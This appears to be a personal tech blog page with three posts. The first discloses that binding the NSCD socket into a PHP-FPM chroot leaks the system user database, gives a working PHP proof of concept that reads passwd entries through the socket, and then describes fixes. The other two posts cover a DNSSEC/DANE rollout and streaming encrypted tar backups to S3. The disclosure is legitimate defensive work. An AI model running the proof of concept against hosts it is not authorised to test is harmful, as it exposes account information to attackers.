vennedey.net

NSCD socket in a PHP-FPM chroot leaks user database

On Wed, 20 Apr 2016 20:54:08 +0200 by Falco Nordmann - Write a comment

If you configure your web server to serve PHP scripts with PHP-FPM you have the option to execute the interpreter in a chrooted environment to prevent scripts to access files outside a given directory tree. While this is a great security feature, it comes with some drawbacks if the PHP scripts need resources from outside the chroot to do their work.

A common example is DNS resolution. If you try to resolve a hostname from inside a PHP-FPM chroot, it won't succeed until you make certain locations of the file system available inside the chroot.

A common workaround suggested by some tutorials is to bind the NSCD socket into the chroot.

root@webhost:~# mkdir -p /home/www/u000/chroot/var/run/nscd
root@webhost:~# touch /home/www/u000/chroot/var/run/nscd/socket
root@webhost:~# mount --bind /var/run/nscd/socket /home/www/u000/chroot/var/run/nscd/socket

This will solve the problem, and DNS resolution will work from inside the chroot.

But since NSCD does not just provide name resolution for domain names, but also for usernames and groups of the system, this configuration might also reveal sensitive information to the chroot.

As a proof of concept I wrote some code to demonstrate the possibility of querying user information from NSCD out of a PHP-FPM chroot.

nscd_passwd.php
<?php
	# PoC code to demonstrate querying user information from NSCD
	# out of a PHP-FPM chroot.
	  
	header('Content-Type: text/plain');
	$u = isset($_GET['u']) ? $_GET['u'] : 'root';
	$s = fsockopen('unix:///var/run/nscd/socket',-1,$en,$es);
	$s || die("Err $en:$es");
	fwrite($s,sprintf("\x02\0\0\0\0\0\0\0%c\0\0\0%s\0",strlen($u)+1,$u));
	$r = fread($s,2048);
	for($i=strlen($r)-2,$b='';;--$i)
		if($r{$i} === "\0") {
			if($r{$i+1} === "\0") break;
			echo strrev($b)."\n";
			$b='';
		} else
			$b .= $r{$i};
	fclose($s);
?>

Upload this script into a PHP-FPM chroot with an available NSCD socket and open it in your browser. Optionally, you can pass ?u=<username> to the script to get information on a certain user. If no username is supplied, root will be used.

This will output the passwd entry of the user:

/bin/bash
/root
root
x
root

To close this leak, you can configure NSCD to not serve any database except the hosts database by setting enable-cache to no for most entries in /etc/nscd.conf. However, this might have a negative impact on your overall system performance since user information has to be retrieved from the database directly.

A better alternative is to bind libnss_dns.so.2 and /etc/resolv.conf to the PHP-FPM chroot instead.

For Debian 8:

root@webhost:~# mkdir -p /home/www/u000/chroot/lib/x86_64-linux-gnu /home/www/u000/chroot/etc
root@webhost:~# touch /home/www/u000/chroot/lib/x86_64-linux-gnu/libnss_dns.so.2 /home/www/u000/chroot/etc/resolv.conf
root@webhost:~# mount --bind /lib/x86_64-linux-gnu/libnss_dns.so.2 /home/www/u000/chroot//lib/x86_64-linux-gnu/libnss_dns.so.2
root@webhost:~# mount -o "remount,ro" /home/www/u000/chroot/lib/x86_64-linux-gnu/libnss_dns.so.2
root@webhost:~# mount --bind /etc/resolv.conf /home/www/u000/chroot/etc/resolv.conf
root@webhost:~# mount -o "remount,ro" /home/www/u000/chroot/etc/resolv.conf

This will allow the interpreter to resolve domain names from inside the chroot and won't reveal the user database.

DNSSEC & DANE

On Tue, 15 Mar 2016 15:17:48 +0100 by Falco Nordmann - Write a comment

Today, I spent some time rolling out DNSSEC for some of my zones to enable clients to verify DNS responses from my nameservers. I also added TLSA records (see RFC 6698) for some domains and for my mail server to provide an additional indication that the TLS certificates sent to the client come from me.

To benefit from DNSSEC and DANE in daily internet life, you can install the DNSSEC/TLSA Validator add-on in your Browser. It will provide you with two additional indicators beside your address bar. It will give you information on

  • Whether the domain name of the URL you are visiting is secured by DNSSEC.
  • Whether there is a TLSA record available for the Domain, and if the TLSA record corresponds to the TLS certificate or public key of the web server.

In the extension's preferences you can enable the option “Cancel HTTPS connection when TLSA validation fails”. This might protect you from a man-in-the-middle attack even if the attacker was able to provide a certificate of the domain from a trusted authority.

If you like to secure your zone with DNSSEC, you first have to find out if your registrar allows you to upload your KSK to the registry. Unfortunately, this is not common nowadays. If you don't find an option in the registrar's control panel, open a support ticket and ask for it.

Then, you need to generate your keys, sign your zones and supply TLSA records for your certificates. Since the keys used along with DNSSEC are comparatively short, you are well-advised to rotate them regularly.

Here are some recommendations on how to achieve all this with bind9 and its „inline signing“ feature.

Pipe data from STDIN to Amazon S3

On Fri, 22 Nov 2013 22:00:29 +0100 by Falco Nordmann - Write a comment

When looking for a solution to store offsite backups during my travels, I was interested in uploading incremental, as well as encrypted backups to Amazon S3, since the API is simple to use, and the price model for their service is affordable, especially when using Amazon's Lifecycle management to transfer S3 objects to Amazon Glacier automatically). When looking deeper into this topic and evaluating available tools, I discovered that most of the available S3 clients where not able to stream data you pipe into them via STDOUT / STDIN directly (using the RAM) to the S3 bucket, but need to store the whole data as a file on your harddrive before being able to upload. The main reason for the lack of this feature is that Amazon's S3 API expects the size (Content-Length) of the data to be stored, before receiving the data itself. After doing further research for tools facing this problem I found js3tream, which tries to get around this problem by splitting the inputstream into chunks of fixed size and storing them as seperate objects in the given S3 bucket. But when trying to work with this tool, I got nothing but a bunch of exceptions, and even when my Java is acceptable I was not able to spot the root of the problem. However, I have noticed that Amazon has been supporting a more suitable way to upload files in multiple chunks since 2010, than js3tream tends to use. Amazon's S3 API provides the opportunity to upload an object in multiple parts, and expects the Content-Length of each part uploaded instead of the Content-Length for the whole object. Using this mechanism, it is possible to split the inputstream into chunks and upload each chunk until the end of the inputstream is reached. When searching for tools supporting this feature, I only found clients being able to read files, instead of reading from STDIN. While s3cmd is able to stream stored data from S3 to STDOUT, it is not able to stream data from STDIN to S3, even though they have announced to integrate this feature. Since I could not find any client suitable for my needs, I wrote some a python script, using boto's S3 interface to upload data read from STDIN chunkwise to S3 using Amazon's multipart upload API.

The script can be found on github. To use it for incremental backups, you can make use of the tips given in the tar HowTo of the js3tream project. To encrypt your backups you can pipe the data generated by tar through gpg.

# tar -g /etc/backup/home/diff -C / -vcpjO /home | \
> gpg -r com-example-backup-home -e | \
> 2s3 -k /etc/backup/home/aws-key -b com-example-backup-home -o backup.0

This example assumes that the file, keeping track of the changes in your filesystem, as well as the file containing the AWS credentials for the access to your S3 bucket are stored in /etc/backup/home/, and you generated a GPG keypair named com-example-backup-home in the users GPG keyring (# gpg –gen-key)

By running this command and incrementing the objects name (backup.1, backup.2, etc) every run, you can construct an incremental, encrypted backup of your user's home directories.

To restore your backup, you can read the S3 object(s) from S3 using s3cmd and pipe the data through GPG and tar the other way round.

# s3cmd get s3://com-example-backup-home/backup.0 - | gpg -d | tar -g /dev/null -C / -xvj
# s3cmd get s3://com-example-backup-home/backup.1 - | gpg -d | tar -g /dev/null -C / -xvj
...

Before using s3cmd, you have to configure it to connect to your S3 bucket. Have a look into the s3tools documentation for further information.